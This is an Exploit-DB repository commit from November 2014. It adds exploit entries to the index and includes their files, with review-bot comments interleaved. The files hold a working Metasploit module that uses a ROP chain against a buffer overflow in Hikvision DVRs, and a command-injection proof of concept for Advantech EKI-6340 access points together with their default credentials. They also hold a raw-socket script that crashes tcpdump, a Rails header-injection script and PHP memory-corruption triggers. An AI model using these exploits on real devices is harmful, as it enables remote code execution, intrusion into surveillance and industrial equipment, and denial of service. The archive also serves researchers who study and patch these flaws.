Updated 11_26_2014

Offensive Security 2014-11-26 04:52:41 +00:00
parent 904c13f502
commit cd1ca949ad
13 changed files with 895 additions and 261 deletions

@ -31813,7 +31813,6 @@ id,file,description,date,author,platform,type,port
35318,platforms/windows/remote/35318.c,"Cain & Abel 2.7.3 'dagc.dll' DLL Loading Arbitrary Code Execution Vulnerability",2011-02-07,d3c0der,windows,remote,0
35319,platforms/php/webapps/35319.txt,"WebAsyst Shop-Script Cross Site Scripting and HTML Injection Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps,0
35320,platforms/php/webapps/35320.txt,"ViArt Shop 4.0.5 Multiple Cross Site Scripting Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps,0
35321,platforms/php/webapps/35321.txt,"Supr Shopsystem 5.1.0 - Persistent UI Vulnerability",2014-11-22,Vulnerability-Lab,php,webapps,0
35322,platforms/windows/local/35322.txt,"Privacyware Privatefirewall 7.0 - Unquoted Service Path Privilege Escalation",2014-11-22,LiquidWorm,windows,local,0
35323,platforms/php/webapps/35323.md,"MyBB <= 1.8.2 - unset_globals() Function Bypass and Remote Code Execution Vulnerability",2014-11-22,"Taoguang Chen",php,webapps,0
35325,platforms/hardware/webapps/35325.txt,"Netgear Wireless Router WNR500 - Parameter Traversal Arbitrary File Access Exploit",2014-11-22,LiquidWorm,hardware,webapps,0
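Review bot: the hunk header (-31813,7 +31813,6) records one row removed, but none of the seven rows rendered here is marked as the deletion, so it is not visible which entry went. Since this same commit deletes platforms/php/webapps/35321.txt, the dropped row is presumably the 35321 Supr Shopsystem line; confirm that both removals are intended and that files.csv and the platforms/ tree stay in sync, otherwise the id is left pointing at a file that no longer exists. The id sequence in this window also already skips 35324.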
@ -31832,3 +31831,14 @@ id,file,description,date,author,platform,type,port
35343,platforms/php/webapps/35343.txt,"Smarty Template Engine <= 2.6.9 '$smarty.template' PHP Code Injection Vulnerability",2011-02-09,jonieske,php,webapps,0
35345,platforms/hardware/webapps/35345.txt,"TP-Link TL-WR740N - Denial Of Service",2014-11-24,LiquidWorm,hardware,webapps,0
35347,platforms/php/webapps/35347.txt,"Dokeos 1.8.6 2 'style' Parameter Cross Site Scripting Vulnerability",2011-02-12,"AutoSec Tools",php,webapps,0
35348,platforms/php/webapps/35348.txt,"MG2 0.5.1 Multiple Cross Site Scripting Vulnerabilities",2011-02-15,LiquidWorm,php,webapps,0
35349,platforms/php/webapps/35349.txt,"Gollos 2.8 Multiple Cross Site Scripting Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0
35350,platforms/php/webapps/35350.txt,"Wikipad 1.6.0 Cross Site Scripting, HTML Injection, and Information Disclosure Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0
35351,platforms/php/webapps/35351.txt,"Photopad 1.2 Multiple Cross Site Scripting Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0
35352,platforms/multiple/remote/35352.rb,"Ruby on Rails 3.0.5 'WEBrick::HTTPRequest' Module HTTP Header Injection Vulnerability",2011-02-16,"Jimmy Bandit",multiple,remote,0
35353,platforms/php/webapps/35353.txt,"GetSimple CMS 2.03 'admin/upload-ajax.php' Remote Arbitrary File Upload Vulnerability",2011-02-15,"s3rg3770 and Chuzz",php,webapps,0
35354,platforms/php/dos/35354.txt,"PHP 5.3.5 'grapheme_extract()' NULL Pointer Dereference Denial Of Service Vulnerability",2011-02-17,"Maksymilian Arciemowicz",php,dos,0
35356,platforms/linux/remote/35356.rb,"Hikvision DVR RTSP Request Remote Code Execution",2014-11-24,metasploit,linux,remote,554
35357,platforms/cgi/webapps/35357.txt,"Advantech EKI-6340 Command Injection",2014-11-24,"Core Security",cgi,webapps,80
35358,platforms/php/dos/35358.txt,"PHP 5.5.12 Locale::parseLocale Memory Corruption",2014-11-24,"John Leitch",php,dos,0
35359,platforms/multiple/dos/35359.txt,"tcpdump 4.6.2 Geonet Decoder Denial of Service",2014-11-24,"Steffen Bauch",multiple,dos,0
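Review bot: the 35352 row is classed platform=multiple, type=remote, yet the file it points to (platforms/multiple/remote/35352.rb) states the issue "works only on intranet apps" and its BID summary limits it to clients on the same subnet as the server, so "remote" overstates it; at least carry the constraint into the description. Two smaller points: the rows dated 2011-02 (35347 through 35354) are backfill from SecurityFocus BID pages, as the source lines in 35352 and 35354 show, interleaved with 2014-11-24 submissions, which is fine because the file is keyed by id; and ids 35344, 35346 and 35355 are absent from this range, presumably still pending. The port column does agree with the files: 554 for 35356 matches Opt::RPORT(554) in the module, and 80 for 35357 matches the PoC URL.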

platforms/cgi/webapps/35357.txt Executable file
@ -0,0 +1,246 @@
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/
Advantech EKI-6340 Command Injection
1. *Advisory Information*
Title: Advantech EKI-6340 Command Injection
Advisory ID: CORE-2014-0009
Advisory URL:
http://www.coresecurity.com/advisories/advantech-eki-6340-command-injection
Date published: 2014-11-19
Date of last update: 2014-11-19
Vendors contacted: Advantech
Release mode: User release
2. *Vulnerability Information*
Class: OS Command Injection [CWE-78]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2014-8387
3. *Vulnerability Description*
The Advantech EKI-6340 [1] series are wireless Mesh AP for outdoor
deployment. With self-healing and self-forming capabilities, the
wireless network is free from interruption even part of Mesh nodes
failed. It's especially critical to infrastructures where wired
solutions are hard to deploy. This Mesh network covers growing rich data
demands such as video security, surveillance and entertainment.
Advantech EKI-6340 series is vulnerable to a OS Command Injection,
which can be exploited by remote attackers to execute arbitrary code and
commands, by using a non privileged user against a vulnerable CGI file.
4. *Vulnerable packages*
. Advantech EKI-6340 V2.05
. Other versions may probably be affected too, but they were not checked.
5. *Vendor Information, Solutions and Workarounds*
Considering that the vendor is not going to fix or update this
device the following recommendations should be taken into consideration
in case of using a vulnerable device:
- Change the 'guest' user password (or delete the user in case
is not used)
- Edit the fshttpd.conf and remove the line
'guest_allow=/cgi/ping.cgi'.
- Check that the 'admin' user doesn't has the default password
as well.
6. *Credits*
This vulnerability was discovered and researched by Facundo Pantaleo
and Flavio Cangini from Core Security Engineering Team. The publication
of this advisory was coordinated by Joaquín Rodríguez Varela from Core
Advisories Team.
7. *Technical Description / Proof of Concept Code*
This vulnerability is caused by an incorrect sanitization of the
input parameters of the file "ping.cgi" that is a symbolic link of
"utility.cgi".
It allows to concatenate commands after the IP direction parameter,
therefore enabling a user to inject OS commands. The "call_ping"
function inside the file "/usr/webui/webroot/cgi/utility.cgi" is where
the vulnerability lays.
The CGI file requieres authentication, but the "admin" user is not
the only one allowed to execute it. Based on the webservers default
configuration file, the "guest" has permissons over it as well. This
user is rarely disbled and its password tends to remain unchanged. This
default credentials are username "user" and password "user" as well.
Below is an example of the webserver (based on Mongoose webserver [2])
default configuration file "fshttpd.conf":
/-----
listening_ports=80,443s
user_admin=admin
pass_admin=admin
user_guest=user
pass_guest=user
document_root=/usr/webui/webroot
authorize_uri=/authorize
unauthorize_uri=/unauthorize
login_uri=/login.html
logout_uri=/logout.html
login_fail_uri=/err/login_fail.html
sessions_full_uri=/err/nosessions.html
no_redirect_uri=/cgi/fwupstatus.cgi
guest_allow=/admin/FWUPStatus.html
guest_allow=/status/*
guest_allow=/utility/Ping.html
guest_allow=/utility/RssiCalc.html
guest_allow=/utility/FresnelZone.html
guest_allow=/cgi/ping.cgi
guest_allow=/cgi/status_query.cgi
guest_allow=/cgi/nodeinfo_query_MAC.cgi
guest_allow=/cgi/nodeinfo_query.cgi
guest_allow=/cgi/nodeinfo_query_AP.cgi
guest_allow=/cgi/fwupstatus.cgi
nologin_allow=/
nologin_allow=/index.*
nologin_allow=/css/*
nologin_allow=/template/*
nologin_allow=/images/*
nologin_allow=/images/dhtmlxcalendar_dhx_skyblue/*
nologin_allow=/js/*
nologin_allow=/favicon.ico
nologin_allow=/err/*
-----/
7.1. *Proof of Concept*
/-----
http://localhost:80/cgi/ping.cgi?pinghost=127.0.0.1;sleep%2010&pingsize=3
When requested for credentials use the following:
User: user
Password: user
-----/
8. *Report Timeline*
. 2014-10-01:
Initial notification sent to ICS-CERT informing of the vulnerability
and requesting the vendor's contact information.
. 2014-10-01:
ICS-CERT informs that they will ask the vendor if they want to
coordinate directly with us or if they prefer to have ICS-CERT mediate.
They request the vulnerability report.
. 2014-10-01:
ICS-CERT informs that the vendor answered that they would like the
ICS-CERT to mediate the coordination of the advisory. They requested
again the vulnerability report.
. 2014-10-01:
We send the vulnerability detail, including technical description
and a PoC.
. 2014-10-09:
We request a status update on the reported vulnerability.
. 2014-10-20:
ICS-CERT informs that the vendor plans to discontinue EKI-6340 early
next year and therefore they will not fix it.
. 2014-11-13:
We inform them that we will publish this advisory as user release on
Wednesday 19th of November.
. 2014-11-19:
Advisory CORE-2014-0009 published.
9. *References*
[1]
http://www.advantech.com.tw/products/56bfcf50-1ada-4ac6-aaf5-4e726ebad002/EKI-6340/mod_04f43dee-f991-44f1-aa1b-bbb1b30f2a72.aspx.
[2] https://code.google.com/p/mongoose/.
10. *About CoreLabs*
CoreLabs, the research center of Core Security, is charged with
anticipating the future needs and requirements for information security
technologies. We conduct our research in several important areas of
computer security including system vulnerabilities, cyber attack
planning and simulation, source code auditing, and cryptography. Our
results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
11. *About Core Security*
Core Security enables organizations to get ahead of threats with
security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security can
be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
12. *Disclaimer*
The contents of this advisory are copyright (c) 2014 Core Security
and (c) 2014 CoreLabs, and are licensed under a Creative Commons
Attribution Non-Commercial Share-Alike 3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/
13. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
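Review bot: the workarounds in section 5 do not line up with the configuration printed in section 7. The guest role's login name is "user" (user_guest=user / pass_guest=user), so "Change the 'guest' user password" should point the reader at the pass_guest line and "delete the user" at the user_guest line; and removing guest_allow=/cgi/ping.cgi only takes the CGI out of the guest allow-list, while the unsanitized pinghost parameter in call_ping stays reachable by admin, so the injection itself remains and the admin-password check is the real control. The PoC host is written as localhost:80 and should be marked as a placeholder for the device address. Several typos should be fixed before release as well: "requieres", "permissons", "disbled", "doesn't has", "a OS Command Injection", and "IP direction" for "IP address".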

platforms/linux/remote/35356.rb Executable file
@ -0,0 +1,140 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = NormalRanking
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Hikvision DVR RTSP Request Remote Code Execution',
'Description' => %q{
This module exploits a buffer overflow in the RTSP request parsing
code of Hikvision DVR appliances. The Hikvision DVR devices record
video feeds of surveillance cameras and offer remote administration
and playback of recorded footage.
The vulnerability is present in several models / firmware versions
but due to the available test device this module only supports
the DS-7204 model.
},
'Author' =>
[
'Mark Schloesser <mark_schloesser[at]rapid7.com>', # @repmovsb, vulnerability analysis & exploit dev
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2014-4880' ],
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/11/19/r7-2014-18-hikvision-dvr-devices--multiple-vulnerabilities' ]
],
'Platform' => 'linux',
'Arch' => ARCH_ARMLE,
'Privileged' => true,
'Targets' =>
[
#
# ROP targets are difficult to represent in the hash, use callbacks instead
#
[ "DS-7204 Firmware V2.2.10 build 131009", {
# The callback handles all target-specific settings
:callback => :target_ds7204_1,
'g_adjustesp' => 0x002c828c,
# ADD SP, SP, #0x350
# LDMFD SP!, {R4-R6,PC}
'g_r3fromsp' => 0x00446f80,
# ADD R3, SP, #0x60+var_58
# BLX R6
'g_blxr3_pop' => 0x00456360,
# BLX R3
# LDMFD SP!, {R1-R7,PC}
'g_popr3' => 0x0000fe98,
# LDMFD SP!, {R3,PC}
} ],
[ "Debug Target", {
# The callback handles all target-specific settings
:callback => :target_debug
} ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 19 2014'))
register_options(
[
Opt::RPORT(554)
], self.class)
end
def exploit
unless self.respond_to?(target[:callback])
fail_with(Failure::NoTarget, "Invalid target specified: no callback function defined")
end
device_rop = self.send(target[:callback])
request = "PLAY rtsp://#{rhost}/ RTSP/1.0\r\n"
request << "CSeq: 7\r\n"
request << "Authorization: Basic "
request << rand_text_alpha(0x280 + 34)
request << [target["g_adjustesp"]].pack("V")[0..2]
request << "\r\n\r\n"
request << rand_text_alpha(19)
# now append the ropchain
request << device_rop
request << rand_text_alpha(8)
request << payload.encoded
connect
sock.put(request)
disconnect
end
# These devices are armle, run version 1.3.1 of libupnp, have random stacks, but no PIE on libc
def target_ds7204_1
# Create a fixed-size buffer for the rop chain
ropbuf = rand_text_alpha(24)
# CHAIN = [
# 0, #R4 pop adjustsp
# 0, #R5 pop adjustsp
# GADGET_BLXR3_POP, #R6 pop adjustsp
# GADGET_POPR3,
# 0, #R3 pop
# GADGET_R3FROMSP,
# ]
ropbuf[8,4] = [target["g_blxr3_pop"]].pack("V")
ropbuf[12,4] = [target["g_popr3"]].pack("V")
ropbuf[20,4] = [target["g_r3fromsp"]].pack("V")
return ropbuf
end
# Generate a buffer that provides a starting point for exploit development
def target_debug
Rex::Text.pattern_create(2000)
end
def rhost
datastore['RHOST']
end
def rport
datastore['RPORT']
end
end
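Review bot: `request << [target["g_adjustesp"]].pack("V")[0..2]` sends only three bytes of the 0x002c828c gadget address; the high byte is 0x00, which cannot be placed inline in the header string, so the overwrite presumably relies on the parser's own string handling (a terminator written over the following CR) to supply it. That is the core trick of the exploit and deserves a comment, as do the 0x280 + 34 offset and the 19 filler bytes after the CRLFCRLF. Smaller points: `rhost` and `rport` are redefined at the bottom although Exploit::Remote::Tcp already provides them, so the overrides can go; the header reads http//metasploit.com/download (missing colon); and the comment "run version 1.3.1 of libupnp" has no visible connection to the RTSP request parser being exploited, so either explain it or drop it.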

@ -0,0 +1,79 @@
CVE-2014-8768 tcpdump denial of service in verbose mode using malformed
Geonet payload
1. Background
tcpdump is a powerful command-line packet analyzer. It allows the user
to intercept and display TCP/IP and other packets being transmitted or
received over a network to which the computer is attached.
2. Summary Information
It was found out that malformed network traffic (Geonet-based) can lead
to an application crash (denial of service) if verbose output of tcpdump
monitoring the network is used.
3. Technical Description
The application decoder for the geonet protocol fails to perform
external input validation and performs insufficient checking on length
computations leading to an unsafe decrement and underflow in the function
geonet_print(netdissect_options *ndo, const u_char *eth, const u_char
*bp, u_int length)
The affected variable is length which is later on used to print a memory
chunk which eventually leads to a segfault. The function contains
several unsafe computations updating the length variable.
To reproduce start tcpdump on a network interface
sudo tcpdump -i lo -s 0 -n -v
(running the program with sudo might hide the segfault message on
certain environments, see dmesg for details)
and use the following python program to generate a frame on the network
(might also need sudo):
#!/usr/bin/env python
from socket import socket, AF_PACKET, SOCK_RAW
s = socket(AF_PACKET, SOCK_RAW)
s.bind(("lo", 0))
geonet_frame =
"\x00\x1f\xc6\x51\x07\x07\x07\x07\x07\x07\x07\x07\x07\x07\xc6\x51\x07\x07\x07\x07\x07\x07\xef\x06\x07\x35\x97\x00\x24\x8c\x7a\xdf\x6f\x08\x00\x45\x00\x00\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01\x68\x0a\x01\x01\x01\x99\x80\x00\x35\x00\x29\x16\xa5\x01\x76\x01\x00\x00\xff\x00\x00\x01\x00\x00\x00"
s.send(geonet_frame)
4. Affected versions
Affected versions are 4.5.0 through 4.6.2
(segfaults were reproducible in versions up to 4.6.1 on Ubuntu 14.04,
but not reliably in 4.6.2. Code audit showed that unsafe computations
are performed in 4.6.2, but the trigger frame might need to look different).
5. Fix
The problem is fixed in the upcoming version tcpdump 4.7.0
6. Advisory Timeline
2014-11-08 Discovered
2014-11-09 Requested CVE
2014-11-11 Reported vendor by email
2014-11-12 Vendor made a fix available as repository patch
2014-11-13 CVE number received
2014-11-13 Published CVE advisory
7. Credit
The issue was found by
Steffen Bauch
Twitter: @steffenbauch
http://steffenbauch.de
using a slightly enhanced version of american fuzzy lop
(https://code.google.com/p/american-fuzzy-lop/) created by Michal Zalewski.
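Review bot: the Python PoC as rendered has `geonet_frame =` on one line and the string on the next, which is a SyntaxError; join them into one statement (or use a backslash continuation) so the file runs as pasted. The frame also merits a one-line comment: the first 14 bytes are an Ethernet header whose type field at bytes 12 and 13 is 0x0707, the old GeoNetworking ethertype that routes the packet to geonet_print, which is the function the text says performs the unsafe length arithmetic. Lastly, section 4 claims 4.5.0 through 4.6.2 are affected while admitting the frame does not reliably crash 4.6.2; that caveat is honest, but the CSV row is titled "tcpdump 4.6.2 Geonet Decoder Denial of Service", so the title should reflect that the reliable trigger is for versions up to 4.6.1.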

@ -0,0 +1,90 @@
source: http://www.securityfocus.com/bid/46423/info
Ruby on Rails is prone to a vulnerability that allows attackers to inject arbitrary content into the 'X-Forwarded-For', 'X-Forwarded-Host' and 'X-Forwarded-Server' HTTP headers because the 'WEBrick::HTTPRequest' module fails to sufficiently sanitize input.
By inserting arbitrary data into the affected HTTP header field, attackers may be able to launch cross-site request-forgery, cross-site scripting, HTML-injection, and other attacks.
NOTE: This issue only affects requests sent from clients on the same subnet as the server.
Ruby on Rails 3.0.5 is vulnerable; other versions may also be affected.
#Encoding: UTF-8
#
# Log-File-Injection - Ruby on Rails 3.05
# possibilities:
# - possible date back attacks (tried with request-log-analyzer: worked but teaser_check_warnings)
# - ip spoofing
# - binary log-injections
# - DOS if ip is used with an iptables-ban-script
#
# !! works only on intranet apps !!
#
# Fix:
# validate request.remote_ip until they fix it
# -----------------------
# jimmybandit.com
# http://webservsec.blogspot.com
require 'rubygems'
require 'mechanize'
require 'iconv'
ip = "192.168.1.21 "
# some shell code just for binary-data demo
payload = ip + "at Mon Jan 01 00:00:00 +1000 2009\x0D\0x0A" # date back attacks with ipspoofing
# payload = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" binarypayload is also possible
a = Mechanize.new
a.pre_connect_hooks << lambda { |p| p[:request]['X-Forwarded-For'] = payload }
page = a.get('http://192.168.1.21/people')
# results
=begin
################################
production.log:
################################
Started GET "/people" for 192.168.1.21 at Mon Jan 01 00:00:00 +1000 2009 at Sun Mar 13 17:47:47 +0100 2011
Processing by PeopleController#index as
Rendered people/index.html.erb within layouts/application (24.4ms)
Completed 200 OK in 63ms (Views: 32.9ms | ActiveRecord: 3.6ms)
################################
request-log-analyzer:
################################
web@debian:~/testapp/log$ request-log-analyzer production.log
Request-log-analyzer, by Willem van Bergen and Bart ten Brinke - version 1.10.0
Website: http://railsdoctors.com
production.log: 100% [==========] Time: 00:00:00
Request summary
???????????????????????
Parsed lines: 14
Skipped lines: 0 <-------
Parsed requests: 7 <-------
Skipped requests: 0
Warnings: teaser_check_failed: 7
First request: 2009-01-01 00:00:12
Last request: 2009-01-01 00:00:12
Total time analyzed: 0 days
Request distribution per hour
????????????????????????????
0:00 ? 7 hits/day ? ?????????????????????????????????
1:00 ? 0 hits/day ?
...
=end
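Review bot: the CRLF in `payload = ip + "at Mon Jan 01 00:00:00 +1000 2009\x0D\0x0A"` is mistyped: in a Ruby double-quoted string `\0x0A` is a NUL byte followed by the literal characters x0A, not a line feed, so the intended line break is never sent (the production.log excerpt shows the injected date landing on the same line as the real timestamp); it should read `\x0D\x0A`. Also `require 'iconv'` is unused and iconv is deprecated on 1.9-era Ruby, the comment says "Rails 3.05" for 3.0.5, and the box-drawing rulers in the request-log-analyzer output came through as runs of "?", so they should be re-encoded or replaced with ASCII.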

platforms/php/dos/35354.txt Executable file
@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/46429/info
PHP is prone to a denial-of-service vulnerability caused by a NULL-pointer dereference.
An attacker can exploit this issue to cause an appliation written in PHP to crash, denying service to legitimate users.
PHP 5.3.5 is vulnerable; other versions may also be affected.
The following proof-of-concept is available:
grapheme_extract('a',-1);
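Review bot: the one-line PoC `grapheme_extract('a',-1);` is missing the `<?php` opener and any mention that ext/intl must be loaded, and it does not say which argument reaches the NULL dereference (presumably the -1 size); a sentence on that, plus fixing the typo "appliation", would make the entry self-contained.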

platforms/php/dos/35358.txt Executable file
@ -0,0 +1,198 @@
Full Package: http://www.exploit-db.com/sploits/35358.tgz
Description:
------------
PHP 5.5.12 suffers from a memory corruption vulnerability that could potentially be exploited to achieve remote code execution. The vulnerability exists due to inconsistent behavior in the get_icu_value_internal function of ext\intl\locale\locale_methods.c. In most cases, get_icu_value_internal allocates memory that the caller is expected to free. However, if the first argument, loc_name, satisfies the conditions specified by the isIDPrefix macro (figure 1), and fromParseLocal is true, loc_name itself is returned. If a caller abides by contract and frees the return value of such a call, then the pointer passed via loc_name is freed again elsewhere, a double free occurs.
Figure 1. Macros used by get_icu_value_internal.
#define isIDSeparator(a) (a == '_' || a == '-')
[...]
#define isPrefixLetter(a) ((a=='x')||(a=='X')||(a=='i')||(a=='I'))
[...]
#define isIDPrefix(s) (isPrefixLetter(s[0])&&isIDSeparator(s[1]))
The zif_locale_parse function, which is exported to PHP as Locale::parseLocale, makes a call to get_icu_value_internal with potentially untrusted data. By passing a specially crafted locale (figure 2), remote code execution may be possible. The exploitability of this vulnerability is dependent on the attack surface of a given application. In instances where the locale string is exposed as a user configuration setting, it may be possible to achieve either pre- or post-authentication remote code execution. In other scenarios this vulnerability may serve as a means to achieve privilege escalation.
Figure 2. A call to Locale::parseLocale that triggers the exploitable condition.
Locale::parseLocale("x-AAAAAA");
Details for the two frees are shown in figures 3 and 4.
Figure 3. The first free.
0:000> kP
ChildEBP RetAddr
016af25c 7146d7a3 php5ts!_efree(
void * ptr = 0x030bf1e0)+0x62 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_alloc.c @ 2440]
016af290 7146f6a2 php_intl!add_array_entry(
char * loc_name = 0x0179028c "",
struct _zval_struct * hash_arr = 0x00000018,
char * key_name = 0x71489e60 "language",
void *** tsrm_ls = 0x7146f6a2)+0x1d3 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\ext\intl\locale\locale_methods.c @ 1073]
016af2b0 0f0c15ab php_intl!zif_locale_parse(
int ht = 0n1,
struct _zval_struct * return_value = 0x030bf4c8,
struct _zval_struct ** return_value_ptr = 0x00000000,
struct _zval_struct * this_ptr = 0x00000000,
int return_value_used = 0n1,
void *** tsrm_ls = 0x0178be38)+0xb2 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\ext\intl\locale\locale_methods.c @ 1115]
016af314 0f0c0c07 php5ts!zend_do_fcall_common_helper_SPEC(
struct _zend_execute_data * execute_data = 0x0179028c,
void *** tsrm_ls = 0x00000018)+0x1cb [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_vm_execute.h @ 551]
016af358 0f114757 php5ts!execute_ex(
struct _zend_execute_data * execute_data = 0x030bef20,
void *** tsrm_ls = 0x0178be38)+0x397 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_vm_execute.h @ 363]
016af380 0f0e60ea php5ts!zend_execute(
struct _zend_op_array * op_array = 0x030be5f0,
void *** tsrm_ls = 0x00000007)+0x1c7 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_vm_execute.h @ 388]
016af3b4 0f0e4a00 php5ts!zend_execute_scripts(
int type = 0n8,
void *** tsrm_ls = 0x00000001,
struct _zval_struct ** retval = 0x00000000,
int file_count = 0n3)+0x14a [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend.c @ 1317]
016af5c0 00cc21fb php5ts!php_execute_script(
struct _zend_file_handle * primary_file = <Memory access error>,
void *** tsrm_ls = <Memory access error>)+0x190 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\main\main.c @ 2506]
016af844 00cc2ed1 php!do_cli(
int argc = 0n24707724,
char ** argv = 0x00000018,
void *** tsrm_ls = 0x0178be38)+0x87b [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\sapi\cli\php_cli.c @ 995]
016af8e0 00cca05e php!main(
int argc = 0n2,
char ** argv = 0x01791d68)+0x4c1 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\sapi\cli\php_cli.c @ 1378]
016af920 76e1919f php!__tmainCRTStartup(void)+0xfd [f:\dd\vctools\crt_bld\self_x86\crt\src\crtexe.c @ 536]
016af92c 770ba8cb KERNEL32!BaseThreadInitThunk+0xe
016af970 770ba8a1 ntdll!__RtlUserThreadStart+0x20
016af980 00000000 ntdll!_RtlUserThreadStart+0x1b
0:000> ub eip
php5ts!_efree+0x49 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_alloc.c @ 2440]:
0f0b1ef9 732e jae php5ts!_efree+0x79 (0f0b1f29)
0f0b1efb 817e4c00000200 cmp dword ptr [esi+4Ch],20000h
0f0b1f02 7325 jae php5ts!_efree+0x79 (0f0b1f29)
0f0b1f04 8bc2 mov eax,edx
0f0b1f06 c1e803 shr eax,3
0f0b1f09 8d0c86 lea ecx,[esi+eax*4]
0f0b1f0c 8b4148 mov eax,dword ptr [ecx+48h]
0f0b1f0f 894708 mov dword ptr [edi+8],eax
0:000> u eip
php5ts!_efree+0x62 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_alloc.c @ 2440]:
0f0b1f12 897948 mov dword ptr [ecx+48h],edi
0f0b1f15 01564c add dword ptr [esi+4Ch],edx
0f0b1f18 a148456a0f mov eax,dword ptr [php5ts!zend_unblock_interruptions (0f6a4548)]
0f0b1f1d 85c0 test eax,eax
0f0b1f1f 0f851d040000 jne php5ts!_efree+0x492 (0f0b2342)
0f0b1f25 5f pop edi
0f0b1f26 5e pop esi
0f0b1f27 59 pop ecx
0:000> ?edi+8
Evaluate expression: 51114464 = 030bf1e0
0:000> dc edi+8
030bf1e0 00000000 41414141 00000000 00000000 ....AAAA........
030bf1f0 00000011 00000019 61636f6c 0300656c ........locale..
030bf200 00000011 00000011 6e697270 00725f74 ........print_r.
030bf210 00000109 00000011 030bf320 030bf210 ........ .......
030bf220 01790494 00000000 00000000 00000000 ..y.............
030bf230 00000000 00000000 00000000 00000000 ................
030bf240 00000000 00000000 00000000 00000000 ................
030bf250 00000000 00000000 00000000 00000000 ................
Figure 4. The second free.
0:000> kP
ChildEBP RetAddr
016af2c4 0f0c1813 php5ts!_zval_dtor_func(
struct _zval_struct * zvalue = 0x030bf3f8)+0x7f [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_variables.c @ 36]
016af314 0f0c0c07 php5ts!zend_do_fcall_common_helper_SPEC(
struct _zend_execute_data * execute_data = 0x0179028c,
void *** tsrm_ls = 0x00000018)+0x433 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_vm_execute.h @ 642]
016af358 0f114757 php5ts!execute_ex(
struct _zend_execute_data * execute_data = 0x030bef20,
void *** tsrm_ls = 0x0178be38)+0x397 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_vm_execute.h @ 363]
016af380 0f0e60ea php5ts!zend_execute(
struct _zend_op_array * op_array = 0x030be5f0,
void *** tsrm_ls = 0x00000007)+0x1c7 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_vm_execute.h @ 388]
016af3b4 0f0e4a00 php5ts!zend_execute_scripts(
int type = 0n8,
void *** tsrm_ls = 0x00000001,
struct _zval_struct ** retval = 0x00000000,
int file_count = 0n3)+0x14a [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend.c @ 1317]
016af5c0 00cc21fb php5ts!php_execute_script(
struct _zend_file_handle * primary_file = <Memory access error>,
void *** tsrm_ls = <Memory access error>)+0x190 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\main\main.c @ 2506]
016af844 00cc2ed1 php!do_cli(
int argc = 0n24707724,
char ** argv = 0x00000018,
void *** tsrm_ls = 0x0178be38)+0x87b [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\sapi\cli\php_cli.c @ 995]
016af8e0 00cca05e php!main(
int argc = 0n2,
char ** argv = 0x01791d68)+0x4c1 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\sapi\cli\php_cli.c @ 1378]
016af920 76e1919f php!__tmainCRTStartup(void)+0xfd [f:\dd\vctools\crt_bld\self_x86\crt\src\crtexe.c @ 536]
016af92c 770ba8cb KERNEL32!BaseThreadInitThunk+0xe
016af970 770ba8a1 ntdll!__RtlUserThreadStart+0x20
016af980 00000000 ntdll!_RtlUserThreadStart+0x1b
0:000> ub eip
php5ts!_zval_dtor_func+0x5e [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_variables.c @ 36]:
0f0b1cae 0f8394000000 jae php5ts!_zval_dtor_func+0xf8 (0f0b1d48)
0f0b1cb4 817f4c00000200 cmp dword ptr [edi+4Ch],20000h
0f0b1cbb 0f8387000000 jae php5ts!_zval_dtor_func+0xf8 (0f0b1d48)
0f0b1cc1 8bc2 mov eax,edx
0f0b1cc3 c1e803 shr eax,3
0f0b1cc6 8d0c87 lea ecx,[edi+eax*4]
0f0b1cc9 8b4148 mov eax,dword ptr [ecx+48h]
0f0b1ccc 894608 mov dword ptr [esi+8],eax
0:000> u eip
